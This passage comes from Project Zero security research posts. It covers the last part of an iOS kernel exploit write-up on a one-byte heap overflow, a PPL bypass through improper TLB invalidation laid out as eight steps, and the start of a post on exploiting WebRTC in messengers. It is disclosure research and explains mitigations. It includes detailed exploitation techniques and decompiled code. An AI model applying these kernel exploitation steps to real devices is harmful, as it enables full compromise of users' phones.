On the other hand, the region 0x801564000 - 0x801b80000 remains writable as expected, and writing to different areas in this region produces odd system behaviors, supporting the theory that this is corrupting data used by coprocessors. For example, writing to some areas would cause the camera and flashlight to become unresponsive, while writing to other areas would cause the phone to panic when the mute slider was switched on.

To get a better sense of what might be happening, I identified the regions in this range by examining the devicetree and dumping memory. In the end, I discovered the following layout of coprocessor firmware segments in the range 0x800000000 - 0x801b80000:

Mapping out the data in the (smaller) physical memory region before the AP carveout, it seems that there are in fact two segments: A larger read-only span containing __TEXT segments (i.e. code) for coprocessor firmwares, and a smaller writable span containing the corresponding __DATA segments of the same firmwares.

Thus, the regions that are locked down are all __TEXT segments of coprocessor firmwares; this strongly suggests that Apple has added a new mitigation to make coprocessor __TEXT segments read-only in physical memory, similar to KTRR on the AMCC (probably Apple's memory controller) but for coprocessor firmwares instead of just the AP kernel. This might be the undocumented CTRR mitigation referenced in the originally published xnu-6153.41.3 sources that appears to be an enhanced replacement for KTRR on A12 and up; Ian Beer suggested CTRR might stand for Coprocessor Text Readonly Region.

Nevertheless, code execution on these coprocessors should still be viable: just as KTRR does not prevent exploitation on the AP, the coprocessor __TEXT lockdown mitigation does not prevent exploitation on coprocessors. So, even though this mitigation makes things more difficult, at this point our plan of disabling a DART and using code execution on the coprocessor to write to a PPL-protected physical address should still work.

The voice of PPL

What did turn out to be a roadblock however was the DART/IOMMU lockdown enforced by PPL on the Application Processor. At boot, XNU parses the "pmap-io-ranges" property in the devicetree to populate the io_attr_table array, which stores page attributes for certain physical I/O addresses. Then, when trying to map the physical address, pmap_enter_options_internal() checks the attributes to see if certain mappings should be disallowed:

wimg_bits = pmap_cache_attributes(pn); // checks io_attr_table
if ( flags )
    wimg_bits = wimg_bits & 0xFFFFFF00 | (u8)flags;
pte |= wimg_to_pte(wimg_bits);
if ( wimg_bits & 0x4000 )
{
    xprr_perm = (pte >> 4) & 0xC | (pte >> 53) & 1 | (pte >> 53) & 2;
    if ( xprr_perm == 0xB )
        pte_perm_bits = 0x20000000000080LL;
    else if ( xprr_perm == 3 )
        pte_perm_bits = 0x20000000000000LL;
    else
        panic("Unsupported xPRR perm ...");
    pte = pte_perm_bits | pte & ~0x600000000000C0uLL;
}
pmap_enter_pte(pmap, pte_p, pte, vaddr);

Thus, we can only map the DART's I/O address into our process if bit 0x4000 is clear in the wimg field. Unfortunately, a quick look at the "pmap-io-ranges" property in the devicetree confirmed that bit 0x4000 was set for every DART:

    addr         len        wimg     signature
0x620000000, 0x40000000,       0x27, 'PCIe'
0x2412C0000,     0x4000,     0x4007, 'DART' ; dart-sep
0x235004000,     0x4000,     0x4007, 'DART' ; dart-sio
0x24AC00000,     0x4000,     0x4007, 'DART' ; dart-aop
0x23B300000,     0x4000,     0x4007, 'DART' ; dart-pmp
0x239024000,     0x4000,     0x4007, 'DART' ; dart-usb
0x239028000,     0x4000,     0x4007, 'DART' ; dart-usb
0x267030000,     0x4000,     0x4007, 'DART' ; dart-ave
...
0x8FC3B4000,     0x4000, 0x40004016, 'GUAT' ; sgx.gfx-handoff-base

Thus, we cannot map the DART into userspace to disable it.

The palantír

Even though PPL prevents us from mapping page tables and DART I/O addresses, the physical I/O addresses for other hardware components are still mappable. Thus, it is still possible to map and read some system component's hardware registers to try and locate the kernel.

My initial attempt was to read from IORVBAR, the Reset Vector Base Address Register accessible via MMIO. The reset vector is the first piece of code that executes on a CPU after it resets; thus, reading IORVBAR would give us the physical address of XNU's reset vector, which would pinpoint the kernelcache in physical memory.

IORVBAR is mapped at offset 0x40000 after the "reg-private" address for each CPU in the devicetree; for example, on A13 CPU 0 it is located at physical address 0x210050000. It is part of the same group of register sets containing CoreSight and DBGWRAP that had been previously used to bypass KTRR. However, I found that IORVBAR is not accessible on A13: trying to read from it will panic.

I spent some time searching the A13 SecureROM for interesting physical addresses before Jann Horn suggested that I map the KTRR lockdown registers on the AMCC, Apple's memory controller. These registers store the physical memory bounds of the KTRR region in order to enforce the KTRR readonly region against attacks from coprocessors.

The AMCC has MMIO registers that store the physical addresses of the bounds of the KTRR lockdown region.


Mapping and reading the AMCC's RORGNBASEADDR register at physical address 0x200000680 worked like a charm, yielding the start address of the lockdown region containing the kernelcache in physical memory. Using security mitigations to break other security mitigations is fun. :)

The back gate is closed

After finding a definitive way forward using AMCC, I looked at one last possibility before giving up on bypassing PPL.

iOS is configured with 40-bit physical addresses and 16K pages (14 bits). Meanwhile, the arbitrary physical page number passed to pmap_enter_options_internal() is 32 bits, and is shifted by 14 and masked with 0xFFFF_FFFF_C000 when inserted into the level 3 translation table entry (L3 TTE). This means that we could control bits 45 - 14 of the TTE, even though bits 45 - 40 should always be zero based on the physical address size programmed in TCR_EL1.IPS.

If the hardware ignored the bits beyond the maximum supported physical address size, then we could bypass PPL by supplying a physical page number that exactly matches the DART I/O address or page table page, but with one of the high bits set. Having the high bits set would cause the mapped address to fail to match any of the addresses in "pmap-io-ranges", even though the TTE would map the same physical address. This would be neat as it would allow us to bypass PPL as a precursor to kernel read/write/execute, rather than the other way around.

Unfortunately, it turns out that the hardware does in fact check that TTE bits beyond the supported physical address size are zero. Thus, I went forward with the AMCC trick to locate the kernelcache instead.

The taming of sysctl

At this point, we have a physical read/write primitive for non-PPL physical addresses, and we know the address of the kernelcache in physical memory. The next step is to build a virtual read/write primitive.

I decided to stick with known techniques for this part: using the fact that the sysctl_oid tree used by the sysctl() syscall is stored in writable memory in the kernelcache to manipulate it and convert benign sysctls allowed by the app sandbox into kernel read/write primitives.

XNU inherited sysctls from FreeBSD; they provide access to certain kernel variables to userspace. For example, the "hw.l1dcachesize" readonly sysctl allows a process to determine the L1 data cache line size, while the "kern.securelevel" read/write sysctl controls the "system security level" used for some operations in the BSD portion of the kernel.

The sysctls are organized into a tree hierarchy, with each node in the tree represented by a sysctl_oid struct. Building a kernel read primitive is as simple as mapping the sysctl_oid struct for some sysctl that is readable in the app sandbox and changing the target variable pointer (oid_arg1) to point to the virtual address we want to read. Invoking the sysctl then  reads that address.

An example sysctl_oid struct in the kernelcache.


Using sysctls to build a write primitive is a bit more complicated, since no sysctls are listed as writable in the container sandbox profile. The ziVA exploit for iOS 10.3.1 worked around this by changing the oid_handler field of the sysctl to call copyin(). However, on PAC-enabled devices like the A13, oid_handler is protected with a PAC, meaning that we cannot change its value.

However, when disassembling the function hook_system_check_sysctlbyname() that implements the sandbox check for the sysctl() system call, I noticed an interesting undocumented behavior:

// Sandbox check sysctl-read
ret = sb_evaluate(sandbox, 116u, &context);
if ( !ret )
{
    // Sandbox check sysctl-write
    if ( newlen | newptr && (namelen != 2 || name[0] != 0 || name[1] != 3) )
        ret = sb_evaluate(sandbox, 117u, &context);
    else
        ret = 0;
}

For some reason, if the sysctl node is deemed readable inside the sandbox, then the write check is not performed on the specific sysctl node { 0, 3 }! What this means is that { 0, 3 } will be writable in every sandbox from which it is readable, regardless of whether or not the sandbox profile allows writes to that sysctl.

As it turns out, the name of the sysctl { 0, 3 } is "sysctl.name2mib", which is a writable sysctl used to convert the string-name of a sysctl into the numeric form, which is faster to look up. It is used to implement sysctlnametomib(). So it makes sense that this sysctl should usually be writable.

The upshot is that even though there are no writable sysctls specified in the sandbox profile, sysctl { 0, 3 } is in fact writable anyways, allowing us to build a virtual write primitive alongside our read primitive. Thus, we now have full arbitrary kernel read/write.

III - The Return of the Copyout

The battle of pmap fields

We have come far, but the journey is not yet done: we must break the ring. As things stand, vm_map_copyout_internal() is spinning in an infinite loop on the "done" vm_map_entry, whose vme_next pointer points to itself. We must guide the safe return of this function to preserve the stability of the system.

Looking back to the vm_map_copyout_internal() function, we are currently spinning in an infinite loop on the "done" entry, having just finished mapping a page.


There are two basic issues preventing this. First, because we've inserted entries into our page tables at the pmap layer without creating corresponding virtual entries at the vm_map layer, there is currently an accounting conflict between the pmap and vm_map views of our address space. This will cause a panic on process exit if not addressed. Second, once the loop is broken, vm_map_copyout_internal() has a call to vm_map_copy_insert() that will panic trying to free the corrupted vm_map_copy to the wrong zone.

We will address the pmap/vm_map conflict first.

Suppose for the moment that we were able to break out of the for loop and allow vm_map_copyout_internal() to return. The call to vm_map_copy_insert() that occurs after the for loop walks through all the entries in the vm_map_copy, unlinks them from the vm_map_copy's entry list, and links them into the vm_map's entry list instead.

static void
vm_map_copy_insert(
    vm_map_t        map,
    vm_map_entry_t  after_where,
    vm_map_copy_t   copy)
{
    vm_map_entry_t  entry;

    while (vm_map_copy_first_entry(copy) !=
               vm_map_copy_to_entry(copy)) {
        entry = vm_map_copy_first_entry(copy);
        vm_map_copy_entry_unlink(copy, entry);
        vm_map_store_entry_link(map, after_where, entry,
            VM_MAP_KERNEL_FLAGS_NONE);
        after_where = entry;
    }
    zfree(vm_map_copy_zone, copy);
}

Since the vm_map_copy's vm_map_entrys are all fake objects residing in shared memory, we really do not want them linked into our vm_map's entry list, where they will be freed on process exit. The simplest solution is thus to update the corrupted vm_map_copy's entry list so that it appears to be empty.

Forcing the vm_map_copy's entry list to appear empty certainly lets us safely return from vm_map_copyout_internal(), but we would nevertheless still get a panic once our process exits:

panic(cpu 3 caller 0xfffffff01f4b1c50): "pmap_tte_deallocate(): pmap=0xfffffff06cd8fd10 ttep=0xfffffff0a90d0408 ptd=0xfffffff132fc3ca0 refcnt=0x2 \n"

The issue is that during the course of the exploit, our mapping primitive forces pmap_enter_options() to insert level 3 translation table entries (L3 TTEs) into our process's page tables, but the corresponding accounting at the vm_map layer never happens. This disagreement between the pmap and vm_map views matters because the pmap layer requires that all physical mappings be explicitly removed before the pmap can be destroyed, and the vm_map layer will not know to remove a physical mapping if there is no vm_map_entry describing the corresponding virtual mapping.

Due to PPL, we can not update the pmap directly, so the simplest solution is to grab a pointer to a legitimate vm_map_entry with faulted-in pages and overlay it on top of the virtual address range at which pmap_enter_options() established our physical mappings. Thus we will update the corrupted vm_map_copy's entry list so that it points to this single "overlay" entry instead.

The fires of stack doom

Finally, it is time to break vm_map_copyout_internal() out of the for loop.

    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {

The macro vm_map_copy_to_entry(copy) expands to:

    (struct vm_map_entry *)(&copy->c_u.hdr.links)

Thus, in order to break out of the loop, we need to process a vm_map_entry with vme_next pointing to the address of the c_u.hdr.links field in the corrupted vm_map_copy originally passed to this function.

The function is currently spinning on the "done" vm_map_entry, and we need to link in one final "overlay" vm_map_entry to address the pmap/vm_map accounting issue anyway. So the simplest way to break the loop is to modify the "overlay" entry's  vme_next to point to &copy->c_u.hdr.links. and then update the "done" entry's vme_next to point to the overlay entry.

To break out of the loop, we will have to link the "done" entry to an "overlay" entry that links back to the corrupted vm_map_copy.


The problem is the call to vm_map_copy_insert() mentioned earlier, which frees the vm_map_copy as if it were of  type ENTRY_LIST:

    zfree(vm_map_copy_zone, copy);

However, the object passed to zfree() is our corrupted vm_map_copy, which was allocated with kalloc(); trying to free it to the vm_map_copy_zone will panic. Thus, we somehow need to ensure that a different, legitimate vm_map_copy object gets passed to the zfree() instead.

Fortunately, if you check the disassembly of vm_map_copyout_internal(), the vm_map_copy pointer is spilled to the stack for the duration of the for loop!

FFFFFFF007C599A4     STR     X28, [SP,#0xF0+copy]
FFFFFFF007C599A8     LDR     X25, [X28,#vm_map_copy.links.next]
FFFFFFF007C599AC     CMP     X25, X27
FFFFFFF007C599B0     B.EQ    loc_FFFFFFF007C59B98
...                             ; The for loop
FFFFFFF007C59B98     LDP     X9, X19, [SP,#0xF0+dst_addr]
FFFFFFF007C59B9C     LDR     X8, [X19,#vm_map_copy.offset]

This makes it easy to ensure that the pointer passed to zfree() is a legitimate vm_map_copy allocated from the vm_map_copy_zone: just scan the kernel stack of the vm_map_copyout_internal() thread while it's still spinning and swap any pointers to the corrupted vm_map_copy with the legitimate one.

Replacing the corrupted vm_map_copy with a valid vm_map_copy that can be safely freed simply requires changing pointers on the kernel stack to point to the replacement copy instead.


At last, we have fixed up the state enough to allow vm_map_copyout_internal() to break the loop and return safely.

Homeward bound

Finally, with a virtual kernel read/write primitive and the vm_map_copyout_internal() thread safely returned, we have achieved our goal: a stable kernel compromise achieved by turning a one-byte controlled heap overflow directly into an arbitrary physical address mapping primitive.

Or rather, a nearly-arbitrary physical address mapping primitive. As we have seen, PPL-protected addresses like page table pages and DARTs cannot be mapped using this technique.

When I started on this journey, I had intended to demonstrate that the conventional approach of going after the kernel task port was both unnecessary and limiting, that other kernel read/write techniques could be equally powerful. I suspected that the introduction of Mach-port based techniques in iOS 10 had biased the sample of publicly-disclosed exploits in favor of Mach-port oriented vulnerabilities, and that this in turn obscured other techniques that were just as promising but publicly less well understood.

The one-byte technique initially seemed to offer a counterpoint to the mainstream exploit flow. After reading the code in vm_map.c and pmap.c, I had expected to be able to simply map all of DRAM into my address space and then implement kernel read/write by performing manual page table walks using those mappings. But it turned out that PPL blocks this technique on modern iOS by preventing certain pages from being mapped at all.

It's interesting to note that similar research was touched upon years ago as well, back when such a thing would have worked. While doing background research for this blog post, I came across a presentation by Azimuth called iOS 6 Kernel Security: A Hacker’s Guide that introduced no fewer than four separate primitives that could be constructed by corrupting various fields of vm_map_copy_t: an adjacent memory disclosure, an arbitrary memory disclosure, an extended heap overflow, and a combined address disclosure and heap overflow at the disclosed address.

A slide from an Azimuth presentation introducing the use of vm_map_copy_t in iOS kernel heap overflow attacks.


At the time of the presentation, the KERNEL_BUFFER type had a slightly different structure, so that c_u.hdr.links.next overlapped a field storing the vm_map_copy's kalloc() allocation size. It might have still been possible to turn a one-byte overflow into a physical memory mapping primitive on some platforms, but it would have been harder since it would require mapping the NULL page and a shared address space. However, a larger overflow like those used in the four aforementioned techniques could certainly change both the type and the c_u.hdr.links.next fields.

After its apparent public introduction in that Azimuth presentation by Mark Dowd and Tarjei Mandt, vm_map_copy corruption was repeatedly cited as a widely used exploit technique. See for example: From USR to SVC: Dissecting the 'evasi0n' Kernel Exploit by Tarjei Mandt; Tales from iOS 6 Exploitation by Stefan Esser; Attacking the XNU Kernel in El Capitan by Luca Todesco; Shooting the OS X El Capitan Kernel Like a Sniper by Liang Chen and Qidan He; iOS 10 - Kernel Heap Revisited by Stefan Esser; iOS kernel exploitation archaeology by Patroklos Argyroudis; and *OS Internals, Volume III: Security and Insecurity by Jonathan Levin, in particular Chapter 18 on TaiG. Given the prevalence of these other forms of vm_map_copy corruption, it would not surprise me to learn that someone had discovered the physical mapping primitive as well.

Then, in OS X 10.11 and iOS 9, the vm_map_copy struct was modified to remove the redundant allocation size and inline data pointer fields in KERNEL_BUFFER instances. It is possible that this was done to mitigate the frequent abuse of this structure in exploits, although it's hard to tell because those fields were redundant and could have been removed simply to clean up the code. Regardless, removing those fields changed vm_map_copy into its current form, weakening the precondition required to carry out this technique to a single byte overflow.

The mitigating of the Shire

So, how effective were the various iOS kernel exploit mitigations at blocking the one-byte technique, and how effective could they be if further hardened?

The mitigations I considered were KASLR, PAN, PAC, PPL, and zone_require. Many other mitigations exist, but either they don't apply to the heap overflow bug class or they aren't sensible candidates to mitigate this particular technique.

First, kernel address space layout randomization, or KASLR. KASLR can be divided into two parts: the sliding of the kernelcache image in virtual memory and the randomization of the kernel_map and submaps (zone_map, kalloc_map, etc.), collectively referred to as the "kernel heap". The kernel heap randomization means that you do need some way to determine the address of the kernel/user shared memory buffer in which we build the fake VM objects. However, once you have the address of the shared buffer, neither form of randomization has much bearing on this technique, for two reasons: First, generic iOS kernel heap shaping primitives exist that can be used to reliably place almost any allocation in the target kalloc zones before a vm_map_copy allocation, so randomization does not block the initial memory corruption. Second, after the corruption occurs, the primitive granted is arbitrary physical read/write, which is independent of virtual address randomization.

The only address randomization which does impact the core exploit technique is that of the kernelcache load address in physical memory. When iOS boots, iBoot loads the kernelcache into physical DRAM at a random address. As discussed in Part I, this physical randomization is quite small at 32 MB. However, improved randomization would not help because the AMCC hardware registers can be mapped to locate the kernelcache in physical memory regardless of where it is located.

Next consider PAN, or Privileged Access Never. This is an ARMv8.1 security mitigation that prevents the kernel from directly accessing userspace virtual memory, thereby preventing the common technique of overwriting pointers to kernel objects so that they point to fake objects living in userspace. Bypassing PAN is a prerequisite for this technique: we need to establish a complex hierarchy of vm_map_entry, vm_object, and vm_page objects at a known address. While hardcoding the shared buffer address is good enough for this POC, better techniques would be needed for a real exploit.

PAC, or Pointer Authentication Codes, is an ARMv8.3 security feature introduced in Apple's A12 SOC. The iOS kernel uses PAC for two purposes: first as an exploit mitigation against certain common bug classes and techniques, and second as a form of kernel control flow integrity to prevent an attacker with kernel read/write from gaining arbitrary code execution. In this setting, we're only interested in PAC as an exploit mitigation.

Apple's website has a table showing how various types of pointers are protected by PAC. Most of these pointers are automatically PAC-protected by the compiler, and the biggest impact of PAC so far is on C++ objects, especially in IOKit. Meanwhile, the one-byte exploit technique only involves vm_map_copy, vm_map_entry, vm_object, and vm_page objects, all plain C structs in the Mach part of the kernel, and so is unaffected by PAC.

However, at BlackHat 2019, Ivan Krstić of Apple announced that PAC would soon be used to protect certain "members of high value data structures", including "processes, tasks, codesigning, the virtual memory subsystem, [and] IPC structures". As of May 2020, this enhanced PAC protection has not yet been released, but if implemented it might prove effective at blocking the one-byte technique.

The next mitigation is PPL, which stands for Page Protection Layer. PPL creates a security boundary between the code that manages page tables and the rest of the XNU kernel. This is the only mitigation besides PAN that impacted the development of this exploit technique.

In practice, PPL could be much stricter about which physical addresses it allows to be mapped into a userspace process. For example, there is no legitimate use case for a userspace process to have access to kernelcache pages, so setting a flag like PVH_FLAG_LOCKDOWN on kernelcache pages could be a weak but sensible step. More generally, addresses outside the Application Processor's DRAM region (including physical I/O addresses for hardware components) could probably be made unmappable for most processes, perhaps with an entitlement escape hatch for exceptional cases.

Finally, the last mitigation is zone_require, a software mitigation introduced in iOS 13 that checks that some kernel pointers are allocated from the expected zalloc zone before using them. I don't believe that XNU's zone allocator was initially intended as a security mitigation, but the fact remains that many objects that are frequently targeted during exploits (in particular ipc_ports, tasks, and threads) are allocated from a dedicated zone. This makes zone checks an effective funnel point for detecting exploitation shenanigans.

In theory, zone_require could be used to protect almost any object allocated from a dedicated zone; in practice, though, the vast majority of zone_require() checks in the kernelcache are on ipc_port objects. Because the one-byte technique avoids the use of fake Mach ports altogether, none of the existing zone_require() checks apply.

However, if the use of zone_require were expanded, it is possible to partially mitigate the technique. In particular, inserting a zone_require() call in vm_map_copyout_internal() once the vm_map_copy has been determined to be of type ENTRY_LIST would ensure that the vm_map_copy cannot be a KERNEL_BUFFER object with a corrupted type. Of course, like all mitigations, this isn't 100% robust: using the technique in an exploit would probably still be possible, but it might require a better initial primitive than a one-byte overflow.

"Appendix A": Annals of the exploits

In my opinion, the one-byte exploit technique outlined in this blog post is a divergence from the conventional strategies employed at least since iOS 10. Fully 19 of the 24 original public exploits that I could find since iOS 10 used dangling or fake Mach ports as an intermediate exploitation primitive. And of the 20 exploits released since iOS 10.3 (when Apple initially started locking down the kernel task port), 18 of those ended by constructing a fake kernel task port. This makes Mach ports the defining feature of modern public iOS kernel exploitation.

Having gone through the motions of using the one-byte technique to build a kernel read/write primitive on top of a simulated heap overflow, I certainly can see the logic of going after the kernel task port instead. Most of the exploits I looked at since iOS 10 have a relatively modular design and a linear flow: an initial primitive is obtained, state is manipulated, an exploitation technique is applied to build a stronger primitive, state is manipulated again, another technique is applied after that, and so on, until finally you have enough to build a fake kernel task port. There are checkpoints along the way: initial corruption, dangling Mach port, 4-byte read primitive, etc. The exact sequence of steps in each case is different, but in broad strokes the designs of different exploits converge. And because of this convergence, the last steps of one exploit are pretty much interchangeable with those of any other. The design of it all "feels clean".

That modularity is not true of this one-byte technique. Once you start the vm_map_copyout_internal() loop, you are committed to this course until after you've obtained a kernel read/write primitive. And because vm_map_copyout_internal() holds the vm_map lock for the duration of the loop, you can't perform any of the virtual memory operations (like allocating virtual memory) that would normally be integral steps in a conventional exploit flow. Writing this exploit thus feels different, more messy.

All that said, and at the risk of sounding like I'm tooting my own horn, the one-byte technique intuitively feels to me somewhat more "technically elegant": it turns a weaker precondition directly into a very strong primitive while sidestepping most mitigations and avoiding most sources of instability and slowness seen in public iOS exploits. Of the 24 iOS exploits I looked at, 22 depend on reallocating a slot for an object that has been recently freed with another object, many doing so multiple times; with the notable exception of SockPuppet, this is an inherently risky operation because another thread could race to reallocate that slot instead. Furthermore, 11 of the 19 exploits since iOS 11 depend on forcing a zone garbage collection, an even riskier step that often takes a few seconds to complete.

Meanwhile, the one-byte technique has no inherent sources of instability or substantial time costs. It looks more like the type of technique I would expect sophisticated attackers would be interested in developing. And even if something goes wrong during the exploit and a bad address is dereferenced in the kernel, the fact that the vm_map lock is held means that the fault results in a deadlock rather than a kernel panic, making the failed exploit look like a frozen process instead of a system crash. (You can even "kill" the deadlocked app in the app switcher UI and then continue using the device afterwards.)

"Appendix B": Conclusions

I'll conclude by returning to the three questions posed at the very beginning of this post:

Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?

These questions are all too "fuzzy" to have real answers, but I'll attempt to answer them anyway.

To the first question, I think the answer is no, the kernel task port is not the singular best exploit flow. In my opinion the one-byte technique is just as good by most measures, and in my personal opinion, I expect there are other as-yet unpublished techniques that are also equally good.

To the second question, on whether the convergence on the kernel task port has obscured other techniques: I don't think there is enough public iOS research to say conclusively, but my intuition is yes. In my own experience, knowing the type of bug I'm looking for has influenced the types of bugs I find, and looking at past exploits has guided my choice in exploit flow. I would not be surprised to learn others feel similarly.

Finally, are existing iOS kernel exploit mitigations effective against unseen exploit flows? Immediately after I developed the POC for the one-byte technique, I had thought the answer was no; but here at the end of this journey, I'm less certain. I don't think PPL was specifically designed to prevent this technique, but it offers a very reasonable place to mitigate it. PAC didn't do anything to block the technique, but it's plausible that a future expansion of PAC-protected pointers would. And despite the fact that zone_require didn't impact the exploit at all, a single-line addition would strengthen the required precondition from a single-byte overflow to a larger overflow that crosses a zone boundary. So, even though in their current form Apple's kernel exploit mitigations were not effective against this unseen technique, they do lay the necessary groundwork to make mitigating the technique straightforward.

Indices

One final parting thought. In Deja-XNU, published 2018, Ian Beer mused about what the "state-of-the-art" of iOS kernel exploitation might have looked like four years prior:

An idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.

This is an important question to consider because, as defenders, we almost never get to see the capabilities of the most sophisticated attackers. If a gap develops between the techniques used by attackers in private and the techniques known to defenders, then defenders may waste resources mitigating against the wrong techniques.

I don't think this technique represents the current state-of-the-art; I'd guess that, like Deja-XNU, it might represent the state-of-the-art of a few years ago. It's worth considering what direction the state-of-the-art may have taken in the meantime.

The core of Apple is PPL: Breaking the XNU kernel's kernel

31 July 2020 at 16:19
By: Tim
Posted by Brandon Azad, Project Zero

While doing research for the one-byte exploit technique, I considered several ways it might be possible to bypass Apple's Page Protection Layer (PPL) using just a physical address mapping primitive, that is, before obtaining kernel read/write or defeating PAC. Given that PPL is even more privileged than the rest of the XNU kernel, the idea of compromising PPL "before" XNU was appealing. In the end, though, I wasn't able to think of a way to break PPL using the physical mapping primitive alone.

PPL's goal is to prevent an attacker from modifying a process's executable code or page tables, even after obtaining kernel read/write/execute privileges. It does this by leveraging APRR to create something of a "kernel inside the kernel" that protects page tables. During normal kernel execution, page tables and page table metadata are read-only, and code that modifies page tables is non-executable; the only way for the kernel to modify page tables is to enter PPL by calling a "PPL routine", which is analogous to a syscall from XNU into PPL. This limits the entry points into the kernel code that can modify page tables to just those PPL routines.

I considered several ideas to bypass PPL using the one-byte technique's physical mapping primitive, including mapping page tables directly, mapping a DART to allow modifying physical memory from a coprocessor, and mapping the I/O addresses used to control clock gating to power down certain components of the system. Unfortunately, none of these ideas panned out.

However, it's not the Project Zero way to leave any mitigation unbroken. So, having exhausted my search for design flaws, I returned to the ever-faithful technique of memory corruption. Sure enough, decompiling a few PPL functions in IDA was sufficient to find some memory corruption.

Decompiler output showing a call to pmap_remove_range_options().
Some memory corruption in pmap_remove_options_internal(). Using a kernel function calling primitive, both va_start and size are controlled.

The function pmap_remove_options_internal() is a PPL routine, one of the "PPL syscalls" from the XNU kernel to the even more privileged PPL. It is called by invoking pmap_remove_options() in XNU, which validates arguments and then calls pmap_remove_options_internal() in PPL. Its purpose is to unmap the supplied virtual address range from the physical memory map (pmap) of a process.

MARK_AS_PMAP_TEXT static int
pmap_remove_options_internal(
        pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
        int options)

The actual work of removing the translation table entries (TTEs) that map the supplied virtual address range is done by calling pmap_remove_range_options(), which takes pointers to the beginning and end of the TTE range to remove from the level 3 (leaf) translation table.

static int
pmap_remove_range_options(
        pmap_t pmap,
        pt_entry_t *bpte,   // The first L3 TTE to remove
        pt_entry_t *epte,   // The end of the TTEs
        uint32_t *rmv_cnt,
        int options)

Unfortunately, when pmap_remove_options_internal() calls pmap_remove_range_options(), it seems to assume that the supplied virtual address range will not cross an L3 translation table boundary, because if it does then the calculated TTE range will span out-of-bounds memory:

remove_count = pmap_remove_range_options(
                   pmap,
                   &l3_table[(va_start >> 14) & 0x7FF],
                   (u64 *)((char *)&l3_table[(va_start >> 14) & 0x7FF]
                         + ((size >> 11) & 0x1FFFFFFFFFFFF8LL)),
                   &rmv_spte,
                   options);

This means that if we have an arbitrary kernel function calling primitive, we can invoke the PPL-entering wrapper function directly and get pmap_remove_options_internal() called with an improper virtual address range, which makes pmap_remove_range_options() try to remove "TTEs" read from out-of-bounds memory while in PPL mode. And since the removed TTEs are zeroed out, this means that we can corrupt PPL-protected memory.

Calling pmap_remove_options_internal() with an address range spanning an L2 TTE boundary (that is, the address range requires two L2 TTEs to map it) will cause the processed TTE array to run off the end of the L3 translation table page, resulting in out-of-bounds TTEs being removed.


But zeroing out-of-bounds TTEs would be a rather annoying primitive to try and leverage for a PPL bypass. Much of the data we'd like to corrupt has probably already been allocated far away from our page tables, and PPL isn't a large enough code base that we're guaranteed to find something interesting we can do just by zeroing memory. And that's to say nothing of the accounting in PPL that would probably detect an attempt to unmap non-existent TTEs!

So instead I chose to focus on a side effect of this out-of-bounds processing: improper TLB invalidation.

Later on in pmap_remove_options_internal(), after the TTEs have been removed, the translation lookaside buffer (TLB) needs to be invalidated in order to ensure that the process cannot continue to access the unmapped pages through stale TLB entries.

    flush_mmu_tlb_region_asid_async(va_start, size, pmap);

This TLB flush occurs on the supplied virtual address range, not the removed TTEs. Thus, there could be a disagreement between the TLB entries invalidated and the L3 TTEs removed if the out-of-bounds TTEs were from a separate region of the process's address space, leaving stale TLB entries for those out-of-bounds TTEs.

By carefully controlling the layout of translation tables, it's possible to transform the out-of-bounds TTE removal into a different bug: improper TLB invalidation. This is because the out-of-bounds TTEs can correspond to discontiguous parts of the virtual address space, causing the set of TTEs removed to differ from the set of TLB entries flushed.


A stale TLB entry would allow a process to continue accessing the physical page after that page has been unmapped and potentially reused for page tables. So if we had a stale TLB entry for an L3 translation table, then we could insert L3 TTEs to map arbitrary PPL-protected pages as writable.

That's pretty much exactly how the PPL bypass works:

  1. Call the kernel function cpm_allocate() to allocate 2 pages of contiguous physical memory called A and B.
  2. Call pmap_mark_page_as_ppl_page() to insert pages A and B at the head of the ppl_page_list so they can be reused for page tables.
  3. Fault in pages for virtual addresses P and Q so that A and B are allocated as L3 TTs for mapping P and Q, respectively. P and Q are discontiguous but have TTEs that are contiguous.
  4. Start a spinner thread bound to a CPU core that reads from page Q in a loop to keep the TLB entry alive.
  5. Call pmap_remove_options() to remove 2 pages starting from virtual address P (which does not include Q). The vulnerability means that TTEs for both P and Q are removed, but only the TLB entry for P is invalidated.
  6. Call pmap_mark_page_as_ppl_page() to insert page Q at the head of the ppl_page_list so it can be reused for page tables.
  7. Fault in a page for virtual address R so that page Q is allocated as an L3 TT for R, even while we continue to have a stale TLB entry for Q.
  8. Using the stale TLB entry, write to page Q to insert an L3 TTE which maps Q itself as writable.

An animation showing the progression of the exploit over time. The vulnerability is used to establish a stale TLB entry for an unmapped page Q which then gets reallocated as an L3 translation table. The stale TLB entry for Q allows us to modify it and insert an L3 TTE mapping Q itself, which can then be used to modify page tables even after the stale TLB entry has been cleared.


This bypass was reported as Project Zero issue 2035 and fixed in iOS 13.6; you can find a POC that demonstrates how to map arbitrary physical addresses into EL0 there. Also, for a much more detailed look at exploiting improper TLB invalidation, check out Jann Horn's excellent blog post on the topic.

This bug demonstrates a common problem when creating a security boundary where none existed before. It's easy for code to make subtle assumptions about the security model (such as where argument validation occurs or what functionality is exposed vs. private) that no longer hold true under the new model. I wouldn't be surprised to see more bugs along this line in PPL.

Overall, though, I came away from this exercise impressed with the design of PPL. I think it's a sound mitigation with a clear security boundary that doesn't introduce more attack surface. My biggest criticism is that the value-add proposition of PPL is still not yet clear to me: What real-world attacks does PPL mitigate? Is it simply laying the groundwork for more sophisticated and powerful mitigations to come? Whatever the answer may be, I still prefer having it. Kudos to Apple for an interesting and well-thought-out mitigation.

Exploiting Android Messengers with WebRTC: Part 1

3 August 2020 at 17:40
By: Tim
Posted by Natalie Silvanovich, Project Zero

This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 2 is scheduled for August 5 and Part 3 is scheduled for August 6.

Part 1: First Attempts

WebRTC is an open source video conferencing solution used by a variety of software including browsers, messaging clients and streaming services. While Project Zero has reported several vulnerabilities in WebRTC in the past, it was not clear whether these bugs were exploitable, especially outside of browsers. I investigated whether two recent bugs are exploitable in popular Android messaging applications.

The Bugs


